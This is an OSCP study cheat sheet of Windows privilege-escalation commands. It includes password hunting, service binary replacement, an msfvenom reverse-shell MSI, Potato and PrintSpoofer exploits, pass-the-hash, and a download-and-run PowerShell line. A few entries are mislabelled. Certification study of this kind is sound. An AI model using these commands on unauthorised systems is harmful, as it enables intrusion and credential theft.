######################################################################
# 05 — WINDOWS PRIVILEGE ESCALATION (OSCP 2025)
######################################################################

# This file focuses on:
#   ✔ Real exploit techniques (OSCP-relevant)
#   ✔ Enumeration commands
#   ✔ Manual, non-MSF privesc paths
#   ✔ PrintSpoofer / AlwaysInstallElevated / Services
######################################################################


======================================================================
# 1. QUICK ENUMERATION (ALWAYS RUN)
======================================================================

###############################
# Basic information
###############################
whoami
whoami /all
hostname
systeminfo
wmic qfe        # Installed hotfixes
set             # Environment variables

###############################
# Users & Groups
###############################
net user
net user <username>
net localgroup
net localgroup administrators

###############################
# Processes & Services
###############################
tasklist /svc
sc query state= all
wmic service get name,displayname,pathname,startmode

###############################
# Networking
###############################
ipconfig /all
netstat -ano
route print

###############################
# Scheduled Tasks
###############################
schtasks /query /fo LIST /v


======================================================================
# 2. SEARCHING FOR PASSWORDS (OSCP GOLD)
======================================================================

###############################
# Search filesystem for passwords
###############################
findstr /S /I /M "password" C:\*.txt
findstr /S /I /M "password" C:\*.xml
findstr /S /I /M "password" C:\*.ini
findstr /S /I /M "password" C:\*.config

###############################
# Registry secrets
###############################
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s

###############################
# Search unattended install files
###############################
dir /s /b C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattend.xml

###############################
# Powershell history
###############################
type C:\Users\<user>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt


======================================================================
# 3. EXPLOITING UNQUOTED SERVICE PATH
======================================================================

###############################
# 1. Find vulnerable service
###############################
wmic service get name,displayname,pathname,startmode | findstr /i "Auto"

# Look for paths like:
#   C:\Program Files\Some Folder\Service.exe
# Without quotes → exploitable

###############################
# 2. Replace executable
###############################
copy rev.exe "C:\Program Files\Some Folder\Service.exe"

###############################
# 3. Restart service
###############################
sc stop "Service"
sc start "Service"


======================================================================
# 4. WEAK SERVICE PERMISSIONS (CAN RECONFIGURE)
======================================================================

###############################
# Check service permissions
###############################
accesschk64.exe -uwcqv $userName *

# If vulnerable:
sc config VulnService binPath= "C:\rev.exe"
sc start VulnService


======================================================================
# 5. ALWAYSINSTALL ELEVATED PRIVESC
======================================================================

###############################
# Check registry keys
###############################
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer

# Both must contain: AlwaysInstallElevated = 1

###############################
# Exploit – Create malicious MSI
###############################
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$localip LPORT=4444 -f msi > evil.msi

###############################
# Run MSI installer as SYSTEM
###############################
msiexec /quiet /qn /i evil.msi


======================================================================
# 6. SE_IMPERSONATE / SE_ASSIGNPRIMARYTOKEN (PRINTSPOOFER)
======================================================================

###############################
# Check privilege
###############################
whoami /priv | findstr SeImpersonatePrivilege

###############################
# Exploit (classic OSCP technique)
###############################
PrintSpoofer64.exe -i -c cmd

# Now you should have a SYSTEM shell.


======================================================================
# 7. DLL HIJACKING
======================================================================

###############################
# 1. Identify DLL load paths
###############################
# Find DLL search paths
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"

# Place malicious DLL
copy payload.dll C:\VulnApp\


# Restart application or service.


======================================================================
# 8. TOKEN IMPERSONATION (WHEN YOU TOUCH LSASS)
======================================================================
RoguePotato.exe -r $localip -e cmd.exe -t 9999
JuicyPotato.exe -t * -p cmd.exe

From elevated shell:

###############################
# List tokens
###############################
.\Rubeus.exe triage

###############################
# Impersonate high-priv token
###############################
.\Rubeus.exe ptt /ticket:<base64_ticket>


======================================================================
# 9. PASS-THE-HASH (LOCAL ADMIN)
======================================================================

###############################
# With impacket-psexec
###############################
impacket-psexec $domain/$user@$targetip -hashes <LM:NTLM>

###############################
# With Evil-WinRM
###############################
evil-winrm -i $targetip -u $user -H <NTLM>


======================================================================
# 10. SCHEDULED TASK ABUSE
======================================================================

###############################
# Check tasks
###############################
schtasks /query /fo LIST /v

Look for:
- Writable scripts
- Writable paths
- Runs as SYSTEM

###############################
# Overwrite script
###############################
echo C:\rev.exe > C:\path\to\task\script.ps1


======================================================================
# 11. INSECURE PERMISSIONS ON EXECUTABLES
======================================================================

###############################
# Check file ACLs
###############################
icacls "C:\Program Files\VulnApp\app.exe"

Look for:
- BUILTIN\Users:(F)
- Everyone:(M)

Overwrite:
copy rev.exe "C:\Program Files\VulnApp\app.exe"


======================================================================
# 12. UAC BYPASSES (IF NOT FULLY PATCHED)
======================================================================

###############################
# Check group
###############################
net localgroup administrators

###############################
# Example auto-elevating binary
###############################
fodhelper.exe  # (only works on older builds)


======================================================================
# 13. WINPEAS – Automated Enumeration
======================================================================

###############################
# Download & run
###############################
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://$localip/winPEAS.ps1')"


======================================================================
# 14. CHECKLIST (OSCP WINDOWS PRIVESC)
======================================================================

✔ Unquoted service paths  
✔ Weak service permissions  
✔ AlwaysInstallElevated  
✔ SeImpersonatePrivilege → PrintSpoofer  
✔ DLL hijacking  
✔ Writable executables  
✔ Scheduled task abuse  
✔ Registry password hunting  
✔ Cleartext passwords in files  
✔ Token impersonation (Rubeus)  
✔ SAM/LSASS extraction (if admin)  
✔ WinPEAS confirmation  


######################################################################
# END OF 05_PRIVESC_WINDOWS
######################################################################
